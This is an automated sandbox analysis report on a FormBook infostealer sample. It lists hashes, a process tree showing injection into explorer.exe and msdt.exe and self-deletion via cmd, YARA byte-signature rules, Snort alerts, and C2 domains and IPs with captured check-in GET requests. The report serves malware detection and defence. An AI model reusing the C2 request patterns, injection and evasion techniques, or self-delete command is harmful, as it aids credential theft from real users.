Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report ejecutable1.exe

Overview

General Information

Sample Name:ejecutable1.exe
Analysis ID:491544
MD5:ff2724ddf0ef0525e9e419db5199e96f
SHA1:3cda3d12e93a6e06f22e205010cb6c3d674285a1
SHA256:5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • ejecutable1.exe (PID: 788 cmdline: 'C:\Users\user\Desktop\ejecutable1.exe' MD5: FF2724DDF0EF0525E9E419DB5199E96F)
    • ejecutable1.exe (PID: 2656 cmdline: C:\Users\user\Desktop\ejecutable1.exe MD5: FF2724DDF0EF0525E9E419DB5199E96F)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • msdt.exe (PID: 2632 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: F67A64C46DE10425045AF682802F5BA6)
          • cmd.exe (PID: 1172 cmdline: /c del 'C:\Users\user\Desktop\ejecutable1.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Possible Applocker BypassShow sources
      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 2632

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: ejecutable1.exeVirustotal: Detection: 36%Perma Link
      Source: ejecutable1.exeReversingLabs: Detection: 13%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: 2.2.ejecutable1.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: ejecutable1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: ejecutable1.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: wntdll.pdb source: ejecutable1.exe, msdt.exe
      Source: Binary string: msdt.pdb source: ejecutable1.exe, 00000002.00000003.441140636.0000000002880000.00000004.00000001.sdmp

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49165 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 162.0.232.162:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49174 -> 93.185.100.223:80
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.dunedinhyperlocal.com
      Source: C:\Windows\explorer.exeDomain query: www.multicoininvestment.com
      Source: C:\Windows\explorer.exeDomain query: www.wwiilive.com
      Source: C:\Windows\explorer.exeDomain query: www.institutosamar.com
      Source: C:\Windows\explorer.exeDomain query: www.petersonmovingco.com
      Source: C:\Windows\explorer.exeDomain query: www.quinnwebster.top
      Source: C:\Windows\explorer.exeDomain query: www.lianxiwan.xyz
      Source: C:\Windows\explorer.exeDomain query: www.oinfoproduto.com
      Source: C:\Windows\explorer.exeDomain query: www.theseattlenotary.com
      Performs DNS queries to domains with low reputationShow sources
      Source: C:\Windows\explorer.exeDNS query: www.lianxiwan.xyz
      Source: DNS query: www.lianxiwan.xyz
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.dunedinhyperlocal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1Host: www.oinfoproduto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1Host: www.multicoininvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.theseattlenotary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1Host: www.petersonmovingco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1Host: www.quinnwebster.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 Sep 2021 15:32:40 GMTServer: nginx/1.19.5Content-Type: text/htmlContent-Length: 583Last-Modified: Sat, 24 Jul 2021 10:05:02 GMTAccept-Ranges: bytesVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
      Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: msdt.exe, 00000004.00000002.666583195.000000000041F000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpString found in binary or memory: http://business.google.com/
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpString found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: msdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmpString found in binary or memory: http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e
      Source: explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmpString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
      Source: explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpString found in binary or memory: https://ads.google.com/localservices
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpString found in binary or memory: https://business.google.com
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpString found in binary or memory: https://schema.org/Locuseriness
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
      Source: msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpString found in binary or memory: https://workspace.google.com
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: unknownDNS traffic detected: queries for: www.wwiilive.com
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.dunedinhyperlocal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1Host: www.oinfoproduto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1Host: www.multicoininvestment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1Host: www.theseattlenotary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1Host: www.petersonmovingco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1Host: www.quinnwebster.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      .NET source code contains very large stringsShow sources
      Source: ejecutable1.exe, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 0.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 0.2.ejecutable1.exe.f50000.3.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 2.2.ejecutable1.exe.f50000.4.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: 2.0.ejecutable1.exe.f50000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
      Source: ejecutable1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
